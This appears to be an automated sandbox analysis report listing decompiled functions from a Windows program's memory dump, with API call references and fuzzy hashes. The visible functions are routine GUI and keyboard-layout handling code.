    if((GetWindowLongA(E004423F8(_v8), 0xffffffec) & 0x00000002) == 0) {
        _t68 = GetWindowLongA(E004423F8(_v8), 0xfffffff0);
        __eflags = _t68 & 0x00800000;
        if((_t68 & 0x00800000) != 0) {
            _t125 = 3;
            _t102 = 0xa00f;
        }
    } else {
        _t125 = 0xa;
        _t102 = 0x200f;
    }
    if(_t102 != 0) {
        SetRect(&_v32, 0, 0, *(_v8 + 0x48), *(_v8 + 0x4c));
        DrawEdge(_v12, &_v32, _t125, _t102);
        E00439028(_v12, _v32.top, _v32.left);
        IntersectClipRect(_v12, 0, 0, _v32.right - _v32.left, _v32.bottom - _v32.top);
    }
    E0043BC9C(_v8, _v12, 0x14, 0);
    E0043BC9C(_v8, _v12, 0xf, 0);
    _t74 = *((intOrPtr*)(_v8 + 0x1d0));
    if(_t74 == 0) {
        L12:
        _pop(_t119);
        *[fs:eax] = _t119;
        _push(0x44038f);
        return RestoreDC(_v12, _v16);
    } else {
        _t104 = *((intOrPtr*)(_t74 + 8)) - 1;
        if(_t104 < 0) {
            goto L12;
        }
        _t105 = _t104 + 1;
        _t126 = 0;
        do {
            _t81 = E0041A80C(*((intOrPtr*)(_v8 + 0x1d0)), _t126);
            _t138 = *((char*)(_t81 + 0x57));
            if(*((char*)(_t81 + 0x57)) != 0) {
                E00440210(_t81, _t105, *((intOrPtr*)(_t81 + 0x40)), _v12, _t126, _t138, *((intOrPtr*)(_t81 + 0x44)));
            }
            _t126 = _t126 + 1;
            _t105 = _t105 - 1;
        } while (_t105 != 0);
        goto L12;
    }
}

                                                                            APIs
                                                                            • SaveDC.GDI32(?), ref: 0044022D
                                                                              • Part of subcall function 00439028: GetWindowOrgEx.GDI32(00000000), ref: 00439036
                                                                              • Part of subcall function 00439028: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0043904C
                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440266
                                                                            • GetWindowLongA.USER32 ref: 0044027A
                                                                            • GetWindowLongA.USER32 ref: 0044029B
                                                                            • SetRect.USER32 ref: 004402CB
                                                                            • DrawEdge.USER32(?,?,00000000,00000000), ref: 004402DA
                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440303
                                                                            • RestoreDC.GDI32(?,?), ref: 00440382
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                            • String ID:
                                                                            • API String ID: 2976466617-0
                                                                            • Opcode ID: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01
                                                                            • Instruction ID: 4aa519c723c9a553b380c3e93beb146f7b5c6051756f74ab7ed9f7139ab4c4a9
                                                                            • Opcode Fuzzy Hash: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01
                                                                            • Instruction Fuzzy Hash: D341FC75A00208AFEB10DFD9C985F9EB7F9EF48304F1141A5BA04EB391D678AE41CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00456A5C(void* __eax, struct HWND__** __edx) {
    long _v20;
    intOrPtr _t17;
    intOrPtr _t30;
    void* _t46;
    void* _t50;
    struct HWND__** _t51;
    struct HWND__* _t52;
    struct HWND__* _t53;
    void* _t54;
    DWORD* _t55;

    _t55 = _t54 + 0xfffffff8;
    _t51 = __edx;
    _t50 = __eax;
    _t46 = 0;
    _t17 =  *((intOrPtr*)(__edx + 4));
    if(_t17 < 0x100 || _t17 > 0x109) {
        L19:
        return _t46;
    } else {
        _t52 = GetCapture();
        if(_t52 != 0) {
            GetWindowThreadProcessId(_t52, _t55);
            _t11 = _t50 + 0x30; // 0x0
            GetWindowThreadProcessId( *_t11,  &_v20);
            if( *_t55 == _v20 && SendMessageA(_t52, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
                _t46 = 1;
            }
            goto L19;
        }
        _t53 =  *_t51;
        _t2 = _t50 + 0x44; // 0x0
        _t30 =  *_t2;
        if(_t30 == 0 || _t53 !=  *((intOrPtr*)(_t30 + 0x29c))) {
            L7:
            if(E004374D8(_t53) == 0 && _t53 != 0) {
                _t53 = GetParent(_t53);
                goto L7;
            }
            if(_t53 == 0) {
                _t53 =  *_t51;
            }
            goto L11;
        } else {
            _t53 = E004423F8(_t30);
            L11:
            if(IsWindowUnicode(_t53) == 0) {
                if(SendMessageA(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
                    _t46 = 1;
                }
            } else {
                if(SendMessageW(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
                    _t46 = 1;
                }
            }
            goto L19;
        }
    }
}


                                                                            APIs
                                                                            • GetCapture.USER32 ref: 00456A82
                                                                            • IsWindowUnicode.USER32(00000000), ref: 00456AC5
                                                                            • SendMessageW.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456AE0
                                                                            • SendMessageA.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456AFF
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00456B0E
                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00456B1C
                                                                            • SendMessageA.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456B3C
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                            • String ID:
                                                                            • API String ID: 1994056952-0
                                                                            • Opcode ID: 988f28035e725d6b90499869a6500e627582e695e9a65bec0a14398d4c93cf55
                                                                            • Instruction ID: cf72f3f59c931989ad5c2206f26d5bdc5f1bc31332a3f3f8568b50df8a80e80a
                                                                            • Opcode Fuzzy Hash: 988f28035e725d6b90499869a6500e627582e695e9a65bec0a14398d4c93cf55
                                                                            • Instruction Fuzzy Hash: 3E219EB12042486FD620EA69C940F67B3DC9F09316B52843AFE59D3783DB28FC04C729
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
E0042715C(void* __ebx) {
    struct HDC__* _v8;
    struct tagPALETTEENTRY _v1000;
    struct tagPALETTEENTRY _v1004;
    struct tagPALETTEENTRY _v1032;
    signed int _v1034;
    short _v1036;
    void* _t24;
    int _t52;
    intOrPtr _t59;
    void* _t61;
    void* _t62;

    _t61 = _t62;
    _push(__ebx);
    _v1036 = 0x300;
    _v1034 = 0x10;
    E00402EFC(_t24, __ebx, 0x40,  &_v1032);
    _v8 = GetDC(0);
    _push(_t61);
    _push(0x427259);
    _push( *[fs:eax]);
    *[fs:eax] = _t62 + 0xfffffbf8;
    _t52 = GetDeviceCaps(_v8, 0x68);
    if(_t52 >= 0x10) {
        GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
        if(_v1004 != 0xc0c0c0) {
            GetSystemPaletteEntries(_v8, _t52 - 8, 8, _t61 + (_v1034 & 0x0000ffff) * 4 - 0x424);
        } else {
            GetSystemPaletteEntries(_v8, _t52 - 8, 1,  &_v1004);
            GetSystemPaletteEntries(_v8, _t52 - 7, 7, _t61 + (_v1034 & 0x0000ffff) * 4 - 0x420);
            GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
        }
    }
    _pop(_t59);
    *[fs:eax] = _t59;
    _push(0x427260);
    return ReleaseDC(0, _v8);
}


                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0042718A
                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 004271A6
                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004271C5
                                                                            • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 004271E9
                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00427207
                                                                            • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0042721B
                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042723B
                                                                            • ReleaseDC.USER32 ref: 00427253
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                            • String ID:
                                                                            • API String ID: 1781840570-0
                                                                            • Opcode ID: e91d54244fb84fac95d03ed3f74244df58bb9bf0f4995b59ae57cf6a99570862
                                                                            • Instruction ID: ce3a1c45e00d95f86b6b4c0876be039325c7f876ce5768e959d2bcb4caf90edf
                                                                            • Opcode Fuzzy Hash: e91d54244fb84fac95d03ed3f74244df58bb9bf0f4995b59ae57cf6a99570862
                                                                            • Instruction Fuzzy Hash: A121A6B1A44218EAEB10DBA5CD81FAE73ECEB08704F5104AAF705F71C1D6799E509B38
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
E0045057C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
    char _v8;
    char _v12;
    char _v16;
    char _v20;
    void* _t46;
    void* _t66;
    void* _t73;
    struct HMENU__* _t76;
    struct HMENU__* _t82;
    intOrPtr _t89;
    void* _t91;
    intOrPtr _t93;
    intOrPtr _t95;
    intOrPtr _t99;
    void* _t104;
    intOrPtr _t112;
    void* _t127;
    intOrPtr _t129;
    void* _t132;

    _v20 = 0;
    _t129 = __edx;
    _t104 = __eax;
    _push(_t132);
    _push(0x450790);
    _push( *[fs:eax]);
    *[fs:eax] = _t132 + 0xfffffff0;
    if(__edx == 0) {
        L7:
        _t44 =  *((intOrPtr*)(_t104 + 0x290));
        if( *((intOrPtr*)(_t104 + 0x290)) != 0) {
            E00433BC8(_t44, 0, 0);
        }
        if(( *(_t104 + 0x1c) & 0x00000008) != 0 || _t129 != 0 && ( *(_t129 + 0x1c) & 0x00000008) != 0) {
            _t129 = 0;
        }
        *((intOrPtr*)(_t104 + 0x290)) = _t129;
        if(_t129 != 0) {
            E00420738(_t129, _t104);
        }
        if(_t129 == 0 || ( *(_t104 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t104 + 0x271)) == 3) {
            _t46 = E004426F4(_t104);
            __eflags = _t46;
            if(_t46 != 0) {
                SetMenu(E004423F8(_t104), 0);
            }
            goto L30;
        } else {
            if( *((char*)( *((intOrPtr*)(_t104 + 0x290)) + 0x5c)) != 0 ||  *((char*)(_t104 + 0x277)) == 1) {
                if(( *(_t104 + 0x1c) & 0x00000010) == 0) {
                    __eflags =  *((char*)(_t104 + 0x277)) - 1;
                    if( *((char*)(_t104 + 0x277)) != 1) {
                        _t66 = E004426F4(_t104);
                        __eflags = _t66;
                        if(_t66 != 0) {
                            SetMenu(E004423F8(_t104), 0);
                        }
                    }
                    goto L30;
                }
                goto L21;
            } else {
                L21:
                if(E004426F4(_t104) != 0) {
                    _t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x290)))) + 0x34))();
                    _t76 = GetMenu(E004423F8(_t104));
                    _t154 = _t73 - _t76;
                    if(_t73 != _t76) {
                        _t82 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x290)))) + 0x34))();
                        SetMenu(E004423F8(_t104), _t82);
                    }
                    E00433BC8(_t129, E004423F8(_t104), _t154);
                }
                L30:
                if( *((char*)(_t104 + 0x276)) != 0) {
                    E00451B54(_t104, 1);
                }
                E004504B4(_t104);
                if( *((intOrPtr*)(_t104 + 0x298)) != 0 && ( *(_t104 + 0x1c) & 0x00000010) != 0 &&  *((intOrPtr*)(_t104 + 0x30)) != 0) {
                    SetWindowPos(E004423F8(_t104), 0, 0, 0, 0, 0, 0x37);
                    E0043BC9C(_t104, 0, 0x85, 0);
                    E0043BC9C(_t104, 0, 0xf, 0);
                }
                _pop(_t112);
                *[fs:eax] = _t112;
                _push(0x450797);
                return E0040473C( &_v20);
            }
        }
    }
    _t89 =  *0x466584; // 0x26e66a0
    _t91 = E00454684(_t89) - 1;
    if(_t91 >= 0) {
        _v8 = _t91 + 1;
        _t127 = 0;
        do {
            _t93 =  *0x466584; // 0x26e66a0
            if(_t129 ==  *((intOrPtr*)(E00454670(_t93, _t127) + 0x290))) {
                _t95 =  *0x466584; // 0x26e66a0
                if(_t104 != E00454670(_t95, _t127)) {
                    _v16 =  *((intOrPtr*)(_t129 + 8));
                    _v12 = 0xb;
                    _t99 =  *0x462bbc; // 0x423728
                    E00406740(_t99,  &_v20);
                    E0040C158(_t104, _v20, 1, _t127, _t129, 0,  &_v16);
                    E00404184();
                }
            }
            _t127 = _t127 + 1;
            _t10 =  &_v8;
            *_t10 = _v8 - 1;
        } while ( *_t10 != 0);
    }
}


                                                                            APIs
                                                                            • GetMenu.USER32(00000000), ref: 004506A0
                                                                            • SetMenu.USER32(00000000,00000000), ref: 004506BD
                                                                            • SetMenu.USER32(00000000,00000000), ref: 004506F2
                                                                            • SetMenu.USER32(00000000,00000000,00000000,00450790), ref: 0045070E
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00450755
                                                                            Strings
                                                                            • (7B , xrefs: 004505EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Menu$LoadStringWindow
                                                                            • String ID: (7B
                                                                            • API String ID: 1738039741-3251261122
                                                                            • Opcode ID: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc
                                                                            • Instruction ID: 391e45c69739de599930f1571a303692f4f31b01482e4dca29fa4868e8c2a8c8
                                                                            • Opcode Fuzzy Hash: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc
                                                                            • Instruction Fuzzy Hash: F151AE34A043445BEB24EF39998675B2694AB8430AF0544BFFC059B397CABCDC498B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
                                                                                                                                  E00443BBC(intOrPtr* __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) { 				intOrPtr* _v8; 				void _v12; 				intOrPtr _v16; 				int _v24; 				int _v28; 				intOrPtr _v32; 				char _v36; 				signed int _t81; 				intOrPtr* _t82; 				intOrPtr _t93; 				signed int _t107; 				signed int _t120; 				signed char _t121; 				intOrPtr _t138; 				intOrPtr _t147; 				void* _t150;  				asm("movsd"); 				asm("movsd"); 				asm("movsd"); 				asm("movsd"); 				_t120 = __ecx; 				_v8 = __eax; 				_t147 =  *0x462f14; // 0x466584 				 *((char*)(_v8 + 0x258)) = 1; 				_push(_t150); 				_push(0x443da0); 				_push( *[fs:edx]); 				 *[fs:edx] = _t150 + 0xffffffe0; 				E0043AA4C(_v8, __ecx, __ecx, _t147); 				_v16 = _v16 + 4; 				E0043BD44(_v8,  &_v28); 				if(E00454628() <  *(_v8 + 0x4c) + _v24) { 					_v24 = E00454628() -  *(_v8 + 0x4c); 				} 				if(E00454634() <  *(_v8 + 0x48) + _v28) { 					_v28 = E00454634() -  *(_v8 + 0x48); 				} 				if(E0045461C() > _v28) { 					_v28 = E0045461C(); 				} 				if(E00454610() > _v16) { 					_v16 = E00454610(); 				} 				SetWindowPos(E004423F8(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10); 				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x25c)) <= 0xfa) { 					_t81 = 0; 				} else { 					_t107 = _t120; 					if(_t107 != 0) { 						_t107 =  *(_t107 - 4); 					} 					_t81 = _t107 & 0xffffff00 | _t107 - 0x00000064 < 0x00000000; 				} 				if(_t81 != 0 &&  *0x46255c != 0) { 					SystemParametersInfoA(0x1016, 0,  &_v12, 0); 					if(_v12 != 0) { 						SystemParametersInfoA(0x1018, 0,  &_v12, 0); 						if(_v12 == 0) { 							E0044737C( &_v36); 							if(_v32 <= _v24) { 								_t121 = 1; 							} else { 								_t121 = 0; 							} 						} else { 							_t121 = 2; 						} 						 *0x46255c(E004423F8(_v8), 0x64,  *(0x462664 + (_t121 & 0x000000ff) * 4) | 0x00040000); 					} 		
		} 				_t82 =  *0x462da4; // 0x466580 				E0043F308(_v8,  *((intOrPtr*)( *_t82 + 0x30))); 				ShowWindow(E004423F8(_v8), 4); 				 *((intOrPtr*)( *_v8 + 0x80))(); 				_pop(_t138); 				 *[fs:eax] = _t138; 				_push(0x443da7); 				 *((intOrPtr*)(_v8 + 0x25c)) = GetTickCount(); 				_t93 = _v8; 				 *((char*)(_t93 + 0x258)) = 0; 				return _t93; 			}                        


                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00443DA0), ref: 00443CA1
                                                                            • GetTickCount.KERNEL32 ref: 00443CA6
                                                                            • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00443CEA
                                                                            • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00443D02
                                                                            • AnimateWindow.USER32(00000000,00000064,?), ref: 00443D47
                                                                            • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00443DA0), ref: 00443D6A
                                                                              • Part of subcall function 0044737C: GetCursorPos.USER32(?,?,00443D1E,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 00447380
                                                                            • GetTickCount.KERNEL32 ref: 00443D87
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                            • String ID:
                                                                            • API String ID: 3024527889-0
                                                                            • Opcode ID: 0d3a6398bf7448182259ca20921321b585508c4eae7e957dc6a7b0303c0f6ddf
                                                                            • Instruction ID: 6ca554415f86ce21c423b390f392124ef01619902e7d0cc64a9ff58f6192d223
                                                                            • Opcode Fuzzy Hash: 0d3a6398bf7448182259ca20921321b585508c4eae7e957dc6a7b0303c0f6ddf
                                                                            • Instruction Fuzzy Hash: A4517F70A00105EFEB10DFA9C982A9EB3F5EF45705F2045A6F900EB351D778AE40DB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                                                                                  E00454878(intOrPtr __eax, void* __ebx, void* __fp0) { 				intOrPtr _v8; 				int _v12; 				void* _v16; 				char _v20; 				void* _v24; 				struct HKL__* _v280; 				char _v536; 				char _v600; 				char _v604; 				char _v608; 				char _v612; 				void* _t60; 				intOrPtr _t106; 				intOrPtr _t111; 				void* _t117; 				void* _t118; 				intOrPtr _t119; 				void* _t129;  				_t129 = __fp0; 				_t117 = _t118; 				_t119 = _t118 + 0xfffffda0; 				_v612 = 0; 				_v8 = __eax; 				_push(_t117); 				_push(0x454a23); 				_push( *[fs:eax]); 				 *[fs:eax] = _t119; 				if( *((intOrPtr*)(_v8 + 0x34)) != 0) { 					L11: 					_pop(_t106); 					 *[fs:eax] = _t106; 					_push(0x454a2a); 					return E0040473C( &_v612); 				} else { 					 *((intOrPtr*)(_v8 + 0x34)) = E004038F8(1); 					E0040473C(_v8 + 0x38); 					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1; 					if(_t60 < 0) { 						L10: 						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x25)) = 0; 						E0041C564( *((intOrPtr*)(_v8 + 0x34)), 1); 						goto L11; 					} else { 						_v20 = _t60 + 1; 						_v24 =  &_v280; 						do { 							if(E00447838( *_v24) == 0) { 								goto L9; 							} else { 								_v608 =  *_v24; 								_v604 = 0; 								if(RegOpenKeyExA(0x80000002, E0040968C( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) { 									goto L9; 								} else { 									_push(_t117); 									_push(0x4549df); 									_push( *[fs:eax]); 									 *[fs:eax] = _t119; 									_v12 = 0x100; 									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) { 										E004049AC( &_v612, 0x100,  &_v536); 										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))(); 										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) { 											E004049AC(_v8 + 0x38, 0x100,  &_v536); 										} 									} 									
_pop(_t111); 									 *[fs:eax] = _t111; 									_push(0x4549e6); 									return RegCloseKey(_v16); 								} 							} 							goto L12; 							L9: 							_v24 = _v24 + 4; 							_t38 =  &_v20; 							 *_t38 = _v20 - 1; 						} while ( *_t38 != 0); 						goto L10; 					} 				} 				L12: 			}                        


                                                                            APIs
                                                                            • GetKeyboardLayoutList.USER32(00000040,?,00000000,00454A23,?,026E66A0,?,00454A85,00000000,?,0043D6E3), ref: 004548CE
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00454936
                                                                            • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004549DF,?,80000002,00000000), ref: 00454970
                                                                            • RegCloseKey.ADVAPI32(?,004549E6,00000000,?,00000100,00000000,004549DF,?,80000002,00000000), ref: 004549D9
                                                                            Strings
                                                                            • System\CurrentControlSet\Control\Keyboard Layouts\%.8x , xrefs: 00454920
                                                                            • layout text , xrefs: 00454967
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                            • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                            • API String ID: 1703357764-2652665750
                                                                            • Opcode ID: 6d950a78d596bce349ac28c6b00e7c38b4d53903a2e4a87453a5ac708e1c6b62
                                                                            • Instruction ID: 59853e96f857d77ef27d539afe0c0d9e90707fb92448eacf3fe576158862f236
                                                                            • Opcode Fuzzy Hash: 6d950a78d596bce349ac28c6b00e7c38b4d53903a2e4a87453a5ac708e1c6b62
                                                                            • Instruction Fuzzy Hash: 42418074A002089FDB10DF65C982BDEB7F4EB88304F5140A6E904EB352D738AE44CF69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                                                                                  E00456C8C(void* __eax, char* __ecx, struct tagMSG* __edx) { 				char _v19; 				char _t12; 				int _t13; 				void* _t14; 				int _t30; 				int _t32; 				MSG* _t42; 				void* _t43; 				char* _t45;  				_t33 = __ecx; 				_push(__ecx); 				_t42 = __edx; 				_t43 = __eax; 				_t32 = 0; 				if(PeekMessageA(__edx, 0, 0, 0, 0) != 0) { 					 *_t45 = _t12; 					if( *_t45 == 0) { 						_t13 = PeekMessageA(_t42, 0, 0, 0, 1); 						asm("sbb eax, eax"); 						_t14 = _t13 + 1; 					} else { 						_t30 = PeekMessageW(_t42, 0, 0, 0, 1); 						asm("sbb eax, eax"); 						_t14 = _t30 + 1; 					} 					if(_t14 != 0) { 						_t32 = 1; 						if(_t42->message == 0x12) { 							 *((char*)(_t43 + 0xa4)) = 1; 						} else { 							_v19 = 0; 							if( *((short*)(_t43 + 0x102)) != 0) { 								_t33 =  &_v19; 								 *((intOrPtr*)(_t43 + 0x100))(); 							} 							if(E004586B8(_t43, _t33, _t42) == 0 && E00456B50(_t43, _t42) == 0 && _v19 == 0 && E00456A0C(_t43, _t42) == 0 && E00456A5C(_t43, _t42) == 0 && E004569C4(_t43, _t42) == 0) { 								TranslateMessage(_t42); 								if( *_t45 == 0) { 									DispatchMessageA(_t42); 								} else { 									DispatchMessageW(_t42); 								} 							} 						} 					} 				} 				return _t32; 			}                        


                                                                            APIs
                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00456CA0
                                                                            • IsWindowUnicode.USER32 ref: 00456CB4
                                                                            • PeekMessageW.USER32 ref: 00456CD5
                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00456CEB
                                                                            • TranslateMessage.USER32 ref: 00456D74
                                                                            • DispatchMessageW.USER32 ref: 00456D80
                                                                            • DispatchMessageA.USER32 ref: 00456D88
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                            • String ID:
                                                                            • API String ID: 2190272339-0
                                                                            • Opcode ID: ce108f1353adfe3f0eabd43af3c2355551d53940c5a503e7f97a1d3e0db82999
                                                                            • Instruction ID: 5f7cc9d7226b631bc1ffbd552804f8e8163c3220582b39396143643a60f640cf
                                                                            • Opcode Fuzzy Hash: ce108f1353adfe3f0eabd43af3c2355551d53940c5a503e7f97a1d3e0db82999
                                                                            • Instruction Fuzzy Hash: 1321D92070438026F6316A254E41B7B97A54F9374AF56481FFD85A73C3DAAEBC8E421E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 55%
                                                                                                                                  E004334BC(void* __ebx, void* __esi, void* __eflags) { 				char _v8; 				struct HINSTANCE__* _v12; 				intOrPtr _v16; 				char _v26; 				char _v32; 				char _v36; 				intOrPtr _t63; 				void* _t66; 				void* _t67; 				intOrPtr _t68; 				void* _t69;  				_t69 = __eflags; 				_t47 = __ebx; 				_t66 = _t67; 				_t68 = _t67 + 0xffffffe0; 				_push(__ebx); 				_v32 = 0; 				_v36 = 0; 				_v8 = 0; 				_push(_t66); 				_push(0x4335ef); 				_push( *[fs:eax]); 				 *[fs:eax] = _t68; 				_v26 = 0; 				GetKeyboardLayoutNameA( &_v26); 				_v16 = E00423918(1); 				_push(_t66); 				_push(0x4335c5); 				_push( *[fs:edx]); 				 *[fs:edx] = _t68; 				E004239B8(_v16, 0x80000002); 				E004049AC( &_v36, 0xa,  &_v26); 				E00404A4C( &_v32, _v36, "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\"); 				E00423A1C(_v16, __ebx, _v32, __esi); 				E00423C4C(_v16,  &_v8, "Layout File", _t69); 				_v12 = E0040DDC0(_v8, _t47, 0x8000); 				_push(_t66); 				_push(0x4335a8); 				_push( *[fs:edx]); 				 *[fs:edx] = _t68; 				 *0x462548 = ( *( *(GetProcAddress(_v12, "KbdLayerDescriptor"))() + 0x28) & 1) == 1; 				_pop(_t63); 				 *[fs:eax] = _t63; 				_push(0x4335af); 				return FreeLibrary(_v12); 			}                        


                                                                            APIs
                                                                            • GetKeyboardLayoutNameA.USER32 ref: 004334E4
                                                                              • Part of subcall function 004239B8: RegCloseKey.ADVAPI32(10CC0000,00423894,00000001,00423936,?,?,0042AD66,00000008,00000060,00000048,00000000,0042AE0B), ref: 004239CC
                                                                              • Part of subcall function 00423A1C: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88
                                                                              • Part of subcall function 0040DDC0: SetErrorMode.KERNEL32 ref: 0040DDCA
